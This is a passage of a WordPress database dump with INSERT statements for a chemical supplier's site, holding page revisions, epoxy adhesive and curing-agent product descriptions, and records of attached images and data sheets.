Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="1054"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-31 19:40:46', '2016-08-31 19:40:46', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1146, 3, '2016-09-01 12:15:09', '2016-09-01 12:15:09', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<strong>On The Cutting Edge of the Performance Chemical Market</strong>\r\n\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.[ux_image]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="1095" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nLooking back at over 60 years of success. Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customer are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="1054"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-09-01 12:15:09', '2016-09-01 12:15:09', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1147, 3, '2016-09-01 12:16:23', '2016-09-01 12:16:23', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<strong>On The Cutting Edge of the Performance Chemical Market</strong>\r\n\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.[ux_image]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="1095" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nLooking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="1054"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-09-01 12:16:23', '2016-09-01 12:16:23', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1148, 3, '2016-09-01 13:35:21', '2016-09-01 13:35:21', '', 'MS-907 epoxy adhesive kit', '', 'inherit', 'open', 'closed', '', 'ms-907-epoxy-adhesive-kit', '', '', '2016-09-01 13:35:21', '2016-09-01 13:35:21', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-907-epoxy-adhesive-kit.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1149, 3, '2016-09-01 13:46:05', '2016-09-01 13:46:05', '<span id="_ctl0__ctl0__ctl0_pageContent_pageContent_pageContent_Description" class="prod-description">MS-907 Two-Part Epoxy Adhesive system kit is a two-part, equal volume, room temperature curing system particularly useful for general purpose bonding. Fast setup time. Perfect for in-plant and field use. Develops bond strength to 3,000 psi. NSN 8040-00-144-9729.</span>\r\n\r\nPerfect for in-plant and field use. Develops superior bond strength and provides adhesion to a variety of substrates. Application: Metals, Glass, Ceramics, Plastics, Wood, Rubber, Fabrics, Concrete Base: Epoxy Resin Color: Part A is blue. Part B is beige. When thoroughly mixed, the resultant color is pale gray Container Size: 3.\r\n\r\n7 oz. Container Type: Tubes Cure Time: 24 hours at 77 F (25 C), or 2 hours at 140 F (60 C), or one hour at 180 F (82 C) Mixing Ratio: Equal parts by volume Special Features: Good adhesion to a wide variety of surfaces which have not been specially cleaned.\r\n\r\nProportioning of Parts A and B not critical. Definite color change during mixing. Temperature Range: Up to 180 F (82 C) Viscosity: Approximately 120, 000 cps, thixotropic Work Life: 20 minutes at 77 F (25 C).', 'MS-907 Two-Part Epoxy Adhesive', 'For bonding metals, glass, ceramics, plastics, wood, rubber, fabrics and concrete.  Miller-Stephenson’s Epoxy 907 Adhesive System is a two-part, equal volume, room temperature curing system particularly useful for general purpose bonding.  Fast set-up time.  Perfect for in-plant and field use.  Develops bond strength up to 3,000 psi.', 'publish', 'open', 'closed', '', 'ms-907-two-part-epoxy-adhesive', '', '', '2016-11-24 20:54:12', '2016-11-24 20:54:12', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1149', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1150, 3, '2016-09-01 13:45:54', '2016-09-01 13:45:54', '', 'MS-907', '', 'inherit', 'open', 'closed', '', 'ms-907', '', '', '2016-09-01 13:45:54', '2016-09-01 13:45:54', '', 1149, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-907.doc', 0, 'attachment', 'application/msword', 0); 
INSERT INTO `wp_posts` VALUES (1151, 3, '2016-09-01 14:06:08', '2016-09-01 14:06:08', '', 'epoxy stripping agent', '', 'inherit', 'open', 'closed', '', 'epoxy-stripping-agent', '', '', '2016-09-01 14:06:08', '2016-09-01 14:06:08', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/epoxy-stripping-agent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1152, 3, '2016-09-01 14:11:20', '2016-09-01 14:11:20', '<h2>MS-111 | Epoxy Stripping Agent</h2>\r\nMS-111 Epoxy stripping agent will readily soften and strip most organic systems, such as epoxies and polyurethanes.  It will not attack any metal surfaces or valuable parts during the time necessary to remove polymers.  Caution: It may darken stainless steel and aluminum.  Our formulations are 100% nonflammable.\r\n\r\n<strong>DIRECTIONS FOR USE:</strong>Vent containers carefully to equalize pressure and pour material carefully at room temperature to avoid splashing and boiling.\r\n\r\n<strong>Coatings:</strong> MS-111 Epoxy Stripping Agent may be applied with a brush containing only non-plastic bristles and handle.  When film has lifted, either scrape or rinse with alcohol.  A second application will occasionally prove necessary.\r\n\r\n<strong>Castings:</strong> Place object to be stripped in tank, cover with liquid, and allow to stand until plastic has disintegrated or loosened.  This will vary from minutes to days depending on casting thickness.  Remove with a hook or basket.  Flush with clean alcohol.\r\n\r\n<strong>STORAGE: </strong>MS-111 should be stored at or below room temperature in a glass or polyethylene container, which should be covered tightly to retard evaporation.  MS-111 should be used as soon as practicable and not stored for prolonged periods in other than original container or glass.  Keep tightly sealed.\r\n<h3>MS-111 | Epoxy Stripping Agent Testing:</h3>\r\nEpoxy Stripping agents should be used with caution and also spot tested on base substrates prior to use.  Observe for immediate discoloration or warping of substrate.  Typically solvent will dissolve epoxy before susceptible substrates below or nearby.\r\n\r\n&nbsp;', 'MS-111 | Epoxy Stripping Agent', 'MS-111 will readily soften and strip most organic systems, such as epoxies and polyurethanes.  It will not attack any metal surfaces or valuable parts during the time necessary to remove polymers.  Caution: It may darken stainless steel and aluminum.  Our formulations are 100% nonflammable.', 'publish', 'open', 'closed', '', 'epoxy-stripping-agent', '', '', '2017-06-30 18:54:40', '2017-06-30 18:54:40', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1152', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1153, 3, '2016-09-01 14:10:31', '2016-09-01 14:10:31', '', 'MS-111', '', 'inherit', 'open', 'closed', '', 'ms-111', '', '', '2016-09-01 14:10:31', '2016-09-01 14:10:31', '', 1152, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-111.doc', 0, 'attachment', 'application/msword', 0); 
INSERT INTO `wp_posts` VALUES (1154, 3, '2016-09-01 15:03:22', '2016-09-01 15:03:22', '', 'MS-460H_462H', '', 'inherit', 'open', 'closed', '', 'ms-460h_462h', '', '', '2016-09-01 15:03:22', '2016-09-01 15:03:22', '', 620, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MS-460H_462H.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1155, 3, '2016-09-01 15:24:49', '2016-09-01 15:24:49', '', 'MS-470C_472C', '', 'inherit', 'open', 'closed', '', 'ms-470c_472c', '', '', '2016-09-01 15:24:49', '2016-09-01 15:24:49', '', 735, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MS-470C_472C.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1156, 3, '2016-09-01 15:40:03', '2016-09-01 15:40:03', '', 'MS-470S_472S', '', 'inherit', 'open', 'closed', '', 'ms-470s_472s', '', '', '2016-09-01 15:40:03', '2016-09-01 15:40:03', '', 190, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MS-470S_472S.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1158, 3, '2016-09-01 15:55:22', '2016-09-01 15:55:22', '', 'MS-470C_472C', '', 'inherit', 'open', 'closed', '', 'ms-470c_472c-3', '', '', '2016-09-01 15:55:22', '2016-09-01 15:55:22', '', 735, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MS-470C_472C-2.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1159, 3, '2016-09-01 16:00:15', '2016-09-01 16:00:15', '', 'MS-465C_467C', '', 'inherit', 'open', 'closed', '', 'ms-465c_467c', '', '', '2016-09-01 16:00:15', '2016-09-01 16:00:15', '', 733, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MS-465C_467C.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1160, 3, '2016-09-01 16:43:30', '2016-09-01 16:43:30', '', 'MS-475C_477C', '', 'inherit', 'open', 'closed', '', 'ms-475c_477c', '', '', '2016-09-01 16:43:30', '2016-09-01 16:43:30', '', 621, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MS-475C_477C.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1161, 3, '2016-09-01 17:26:03', '2016-09-01 17:26:03', '', 'MS-452N', '', 'inherit', 'open', 'closed', '', 'ms-452n', '', '', '2016-09-01 17:26:03', '2016-09-01 17:26:03', '', 622, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MS-452N.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1162, 3, '2016-09-01 17:32:07', '2016-09-01 17:32:07', '', 'MS-114C', '', 'inherit', 'open', 'closed', '', 'ms-114c-2', '', '', '2016-09-01 17:32:07', '2016-09-01 17:32:07', '', 623, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MS-114C.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1163, 3, '2016-11-24 04:04:02', '2016-11-24 04:04:02', 'MS-111 Epoxy stripping agent will readily soften and strip most organic systems, such as epoxies and polyurethanes.  It will not attack any metal surfaces or valuable parts during the time necessary to remove polymers.  Caution: It may darken stainless steel and aluminum.  Our formulations are 100% nonflammable.\n\n<strong>DIRECTIONS FOR USE:</strong>Vent containers carefully to equalize pressure and pour material carefully at room temperature to avoid splashing and boiling.\n\n<strong>Coatings:</strong> MS-111  may be applied with a brush containing only non-plastic bristles and handle.  When film has lifted, either scrape or rinse with alcohol.  A second application will occasionally prove necessary.\n\n<strong>Castings:</strong> Place object to be stripped in tank, cover with liquid, and allow to stand until plastic has disintegrated or loosened.  This will vary from minutes to days depending on casting thickness.  Remove with a hook or basket.  Flush with clean alcohol.\n\n<strong>STORAGE: </strong>MS-111 should be stored at or below room temperature in a glass or polyethylene container, which should be covered tightly to retard evaporation.  MS-111 should be used as soon as practicable and not stored for prolonged periods in other than original container or glass.  Keep tightly sealed.\n\nEpoxy Stripping agents should be used with caution and also spot tested on base substrates prior to use.  Observe for immediate discoloration or warping of substrate.  Typically solvent will dissolve epoxy before susceptible substrates below or nearby.\n\n&nbsp;', 'MS-111 Epoxy Stripping Agent', 'MS-111 will readily soften and strip most organic systems, such as epoxies and polyurethanes.  It will not attack any metal surfaces or valuable parts during the time necessary to remove polymers.  Caution: It may darken stainless steel and aluminum.  Our formulations are 100% nonflammable.', 'inherit', 'closed', 'closed', '', '1152-autosave-v1', '', '', '2016-11-24 04:04:02', '2016-11-24 04:04:02', '', 1152, 'https://132.148.10.86/wordpress/1152-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1164, 3, '2016-09-01 18:18:05', '2016-09-01 18:18:05', '', 'EPIKURE™ 3030', 'EPIKURE™Curing Agent 3030 is a very low viscosity amidoamine, medium imidazoline content epoxy curing agent based on tall oil fatty acid and polyamines. It is moderately fast setting and exhibits excellent epoxy resin compatibility in systems “as is” or with co-curing agents such as EPIKURE Curing Agent 3370. Benefits include:\r\n<ul>\r\n 	<li>Excellent epoxy resin compatibility</li>\r\n 	<li>Good corrosion resistance</li>\r\n 	<li>Low viscosity</li>\r\n 	<li>Moderate pot life</li>\r\n 	<li>High filler loading</li>\r\n 	<li>Excellent wetting characteristics</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3030', '', '', '2016-09-23 17:28:42', '2016-09-23 17:28:42', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1164', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1165, 3, '2016-09-01 18:17:13', '2016-09-01 18:17:13', '', '3030', '', 'inherit', 'open', 'closed', '', '3030', '', '', '2016-09-01 18:17:13', '2016-09-01 18:17:13', '', 1164, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/3030.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1166, 3, '2016-09-01 18:22:50', '2016-09-01 18:22:50', '', 'EPIKURE™ 3046', 'EPIKURE™ Curing Agent 3046, an aliphatic amidoamine, is in the same class as EPIKURE Curing Agent\r\n3055. The useful combining ratio with EPON™ Resin 828, varying from 35 to 100 parts per 100 parts resin,\r\nmakes EPIKURE Curing Agent 3046 a very versatile ambient temperature curing agent.  Benefits include:\r\n<ul>\r\n 	<li>Low viscosity</li>\r\n 	<li>Immediate compatibility</li>\r\n 	<li>Long working life</li>\r\n 	<li>Variable combining ratio</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3046', '', '', '2016-09-23 17:41:56', '2016-09-23 17:41:56', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1166', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1167, 3, '2016-09-01 18:21:45', '2016-09-01 18:21:45', '', '3046', '', 'inherit', 'open', 'closed', '', '3046', '', '', '2016-09-01 18:21:45', '2016-09-01 18:21:45', '', 1166, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/3046.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1168, 3, '2016-09-01 18:25:50', '2016-09-01 18:25:50', '', 'EPIKURE™ 3055', 'EPIKURE Curing Agent 3055 is an aliphatic amidoamine. Due to its versatility and convenient working characteristics, it should be considered for room temperature curing applications for epoxy resins and in many applications where elevated temperature curing cycles can be used. W hen EPIKURE 3055 is used as the sole crosslinker, the combining ratio with an epoxy resin can be varied to obtain a wide range of properties. It may also be used in conjunction with other curing agents to vary properties or curing rates. Benefits include:\r\n<ul>\r\n 	<li>Low viscosity</li>\r\n 	<li>Complete compatibility with conventional epoxy resins</li>\r\n 	<li>Extended pot life</li>\r\n 	<li>Wide range of combining ratios</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3055', '', '', '2016-09-23 17:42:47', '2016-09-23 17:42:47', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1168', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1169, 3, '2016-09-01 18:24:18', '2016-09-01 18:24:18', '', '3055', '', 'inherit', 'open', 'closed', '', '3055', '', '', '2016-09-01 18:24:18', '2016-09-01 18:24:18', '', 1168, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/3055.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1170, 3, '2016-09-01 18:33:35', '2016-09-01 18:33:35', '[product_categories number="10" parent="0" columns="8" title="Our categories"]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" text_width="70%" text_align="center" text_pos="center" parallax="0" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Semi-Permanent Mold Release</h4>\r\n[button text="TELL ME MORE" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent/"]\r\n\r\n[/ux_banner]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-09-01 18:33:35', '2016-09-01 18:33:35', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1171, 3, '2016-09-01 18:36:17', '2016-09-01 18:36:17', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n<h4 class="alt-font "><strong>Semi-Permanent\r\nMold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson\r\nExclusive Product\r\n\r\n<a class="button alt-button white" title="" href="../product-category/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process.  Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-09-01 18:36:17', '2016-09-01 18:36:17', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1172, 2, '2016-09-02 12:33:00', '2016-09-02 12:33:00', '', 'IMG_1265[1]', '', 'inherit', 'open', 'closed', '', 'img_12651', '', '', '2016-09-02 12:33:00', '2016-09-02 12:33:00', '', 944, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/IMG_12651.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1173, 2, '2016-09-02 12:35:53', '2016-09-02 12:35:53', '', 'IMG_1264[1]', '', 'inherit', 'open', 'closed', '', 'img_12641', '', '', '2016-09-02 12:35:53', '2016-09-02 12:35:53', '', 944, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/IMG_12641.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1174, 2, '2016-09-02 12:36:05', '2016-09-02 12:36:05', '', 'IMG_1263[1]', '', 'inherit', 'open', 'closed', '', 'img_12631', '', '', '2016-09-02 12:36:05', '2016-09-02 12:36:05', '', 944, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/IMG_12631.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1175, 2, '2016-09-02 12:36:23', '2016-09-02 12:36:23', '', 'IMG_1262[1]', '', 'inherit', 'open', 'closed', '', 'img_12621', '', '', '2016-09-02 12:36:23', '2016-09-02 12:36:23', '', 944, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/IMG_12621.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1176, 2, '2016-09-02 12:38:37', '2016-09-02 12:38:37', '', 'IMG_1259[1]', '', 'inherit', 'open', 'closed', '', 'img_12591', '', '', '2016-09-02 12:38:37', '2016-09-02 12:38:37', '', 944, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/IMG_12591.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1177, 2, '2016-09-02 12:38:54', '2016-09-02 12:38:54', '', 'IMG_1256[1]', '', 'inherit', 'open', 'closed', '', 'img_12561-2', '', '', '2016-09-02 12:38:54', '2016-09-02 12:38:54', '', 944, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/IMG_12561-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1178, 3, '2016-09-02 13:19:32', '2016-09-02 13:19:32', '', 'EPIKURE™ 3155', 'EPIKURE Curing Agent 3155 is a low viscosity, modified polyamide epoxy curing agent based on dimerized fatty acid and polyamines. The low viscosity of EPIKURE Curing Agent 3155 allows formulation of products with high levels of pigmentation and use of little or no solvent, depending on end use application. It is well-suited for use in higher solids coating formulations where low volatile organic content (VOC) compliance is required.  Benefits include:\r\n<ul>\r\n 	<li>Good corrosion and chemical resistance</li>\r\n 	<li>Good flexibility</li>\r\n 	<li>Superior epoxy resin compatibility</li>\r\n 	<li>Long pot life</li>\r\n 	<li>Good blush resistance</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3155-2', '', '', '2016-09-23 17:24:29', '2016-09-23 17:24:29', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1178', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1179, 2, '2016-09-02 13:12:40', '2016-09-02 13:12:40', '', 'KRYTOX BANNER', '', 'inherit', 'open', 'closed', '', 'krytox-banner', '', '', '2016-09-02 13:13:01', '2016-09-02 13:13:01', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/KRYTOX-BANNER.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1180, 3, '2016-09-02 13:18:21', '2016-09-02 13:18:21', '', '3155', '', 'inherit', 'open', 'closed', '', '3155-2', '', '', '2016-09-02 13:18:21', '2016-09-02 13:18:21', '', 1178, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/3155.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1181, 3, '2016-09-02 13:27:46', '2016-09-02 13:27:46', '', 'EPIKURE™ 3164', 'EPIKURE™ Curing Agent 3164 is a proprietary oligomeric polyamine curing agent for structural applications. Epoxy resins cured with EPIKURE Curing Agent 3164 can produce films, castings, or adhesive joints with a high degree of toughness and flexibility. Benefits include:\r\n<ul>\r\n 	<li>Imparts highly flexible properties</li>\r\n 	<li>Improved toughness compared to conventional polyamines</li>\r\n 	<li>Improved combinations of elongation, strength, modulus, abrasion resistance, and tear resistance in\r\ncomparison with those given by other "flexibilizing" curing agents</li>\r\n 	<li>Strong low temperature properties of cured formulations</li>\r\n 	<li>Good adhesion to a variety of substrates</li>\r\n 	<li>Resistant to surface blush and amine exudates</li>\r\n 	<li>Useful as formulating tool in blending with other curing agents to impart desired properties</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3164', '', '', '2016-09-23 17:24:21', '2016-09-23 17:24:21', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1181', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1182, 3, '2016-09-02 13:26:53', '2016-09-02 13:26:53', '', '3164', '', 'inherit', 'open', 'closed', '', '3164', '', '', '2016-09-02 13:26:53', '2016-09-02 13:26:53', '', 1181, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/3164.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1183, 3, '2016-09-02 13:32:45', '2016-09-02 13:32:45', '', 'EPIKURE™ 3223', 'EPIKURE™ Curing Agent 3233 is an unmodified, T403-type polyoxypropylenetriamine that has moderate reactivity, low viscosity, low color, low vapor pressure and high primary amine content. It resists “blush”, “bloom” and “sweat-out” in epoxy compositions. EPIKURE Curing Agent 3233 is a trifunctional primary amine curing agent with the idealized chemical structure shown below. Benefits include:\r\n<ul style="list-style-type: disc;">\r\n 	<li>low viscosity and low vapor pressure</li>\r\n 	<li>light color and improved color retention compared to conventional amine-cured epoxy systems</li>\r\n 	<li>long pot life</li>\r\n 	<li>improved flexibility and good impact resistance</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3223', '', '', '2016-09-23 17:23:29', '2016-09-23 17:23:29', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1183', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1184, 3, '2016-09-02 13:31:38', '2016-09-02 13:31:38', '', '3233', '', 'inherit', 'open', 'closed', '', '3233', '', '', '2016-09-02 13:31:38', '2016-09-02 13:31:38', '', 1183, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/3233.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1185, 3, '2016-09-02 13:37:27', '2016-09-02 13:37:27', '', 'EPIKURE™ 3234', 'EPIKURE™ Curing Agents 3200, 3223, 3234, and 3245 are unmodified aliphatic amines. They are used in a variety of applications including epoxy curing agents. Due to their tendency to form complexes with atmospheric carbon dioxide, particularly in humid conditions, they are most often formulated, adducted or otherwise reacted to inhibit amine blush. As members of the ethylene amine family, they lend themselves to a wide variety of chemical reactions and end use applications.', 'publish', 'open', 'closed', '', 'epikure-3234', '', '', '2016-09-23 17:23:17', '2016-09-23 17:23:17', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1185', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1186, 3, '2016-09-02 13:36:43', '2016-09-02 13:36:43', '', '3223 3234 3245', '', 'inherit', 'open', 'closed', '', '3223-3234-3245', '', '', '2016-09-02 13:36:43', '2016-09-02 13:36:43', '', 1185, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/3223-3234-3245.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1187, 3, '2016-09-02 13:40:49', '2016-09-02 13:40:49', 'EPIKURE 3245 Epoxy Curing Agent as well as 3200, 3223, and 3234, are unmodified aliphatic amines. They are used in a variety of applications including epoxy curing agents. Due to their tendency to form complexes with atmospheric carbon dioxide, particularly in humid conditions, they are most often formulated, adducted or otherwise reacted to inhibit amine blush. As members of the ethylene amine family, they lend themselves to a wide variety of chemical reactions and enduse applications.\r\n\r\n<strong>Application Areas/Suggested Uses</strong>\r\n<ul>\r\n 	<li>\r\n<div class="Section1">Epoxy curing agents</div></li>\r\n 	<li>\r\n<div class="Section1">Polyamides for inks and adhesives</div></li>\r\n 	<li>\r\n<div class="Section1">Wet strength resins</div></li>\r\n 	<li>\r\n<div class="Section1">Corrosion inhibitors</div></li>\r\n 	<li>\r\n<div class="Section1">Oil and fuel additives</div></li>\r\n 	<li>\r\n<div class="Section1">Chelating agents</div></li>\r\n</ul>\r\n<strong>Specification</strong>\r\n<table style="height: 190px;" border="1" width="854" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="176"></td>\r\n<td 